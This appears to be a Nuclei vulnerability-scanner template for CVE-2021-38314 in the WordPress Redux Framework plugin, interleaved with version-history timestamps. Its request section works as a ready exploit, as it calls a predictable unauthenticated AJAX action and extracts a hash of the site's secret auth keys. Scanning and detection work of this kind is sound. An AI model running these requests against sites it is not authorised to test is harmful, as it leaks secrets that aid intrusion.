2021-09-16 16:29:41 +00:00
id : CVE-2021-38314
2021-09-16 14:08:12 +00:00
info :
2023-04-06 18:51:36 +00:00
name : WordPress Redux Framework <=4.2.11 - Information Disclosure
2021-09-16 14:08:12 +00:00
author : meme-lord
severity : medium
2023-04-06 18:51:36 +00:00
description : WordPress Redux Framework plugin through 4.2.11 is susceptible to information disclosure. The plugin registers several unique AJAX actions available to unauthenticated users in the includes function in redux-core/class-redux-core.php. These are predictable, given that they are based on an md5 hash of the site URL with a known salt value of -redux and an md5 hash of the previous hash with a known salt value of -support. An attacker can potentially employ these AJAX actions to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of the site's AUTH_KEY concatenated with the SECURE_AUTH_KEY.
2023-09-06 12:09:01 +00:00
remediation : |
Update WordPress Redux Framework to version 4.2.12 or later.
2021-09-17 09:50:33 +00:00
reference :
2021-09-17 13:17:28 +00:00
- https://www.wordfence.com/blog/2021/09/over-1-million-sites-affected-by-redux-framework-vulnerabilities/
2021-12-04 16:47:25 +00:00
- https://wahaz.medium.com/unauthenticated-sensitive-information-disclosure-at-redacted-2702224098c
2021-10-04 17:20:43 +00:00
- https://blog.sorcery.ie/posts/redux_wordpress/
2023-04-06 18:51:36 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-38314
2021-09-21 08:07:26 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 5.3
2021-09-21 08:07:26 +00:00
cve-id : CVE-2021-38314
2023-10-26 18:00:24 +00:00
cwe-id : CWE-200,CWE-916
2023-07-15 16:29:17 +00:00
epss-score : 0.00153
2023-10-26 18:00:24 +00:00
epss-percentile : 0.51423
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:redux:gutenberg_template_library_\&_redux_framework:*:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : redux
product : gutenberg_template_library_\&_redux_framework
2023-09-06 12:09:01 +00:00
framework : wordpress
2023-07-11 19:49:27 +00:00
tags : cve,cve2021,wordpress,wp-plugin
2021-09-16 14:08:12 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-09-16 14:08:12 +00:00
- raw :
- |
GET /wp-admin/admin-ajax.php?action={{md5(replace('http://HOST/-redux','HOST',Hostname))}} HTTP/1.1
Host : {{Hostname}}
Accept : */*
- |
GET /wp-admin/admin-ajax.php?action={{md5(replace('https://HOST/-redux','HOST',Hostname))}} HTTP/1.1
Host : {{Hostname}}
Accept : */*
stop-at-first-match : true
2023-07-11 19:49:27 +00:00
2021-09-16 14:08:12 +00:00
matchers-condition : and
matchers :
- type : dsl
dsl :
- "len(body)<50"
- type : regex
name : meme
2023-07-11 19:49:27 +00:00
part : body
2021-09-16 14:08:12 +00:00
regex :
- '[a-f0-9]{32}'
- type : status
status :
- 200
extractors :
- type : regex
regex :
2023-07-11 19:49:27 +00:00
- '[a-f0-9]{32}'
part : body
2023-10-27 06:32:23 +00:00
# digest: 490a004630440220523a94b8b77c960bb863cbfd17cd49121d2d3d6d563faca80fc8ad9c3e8227350220670802b19db6004e4d7b55d9dd237c487e375226ddec291e5b798f6496ed2472:922c64590222798bb761d5b6d8e72950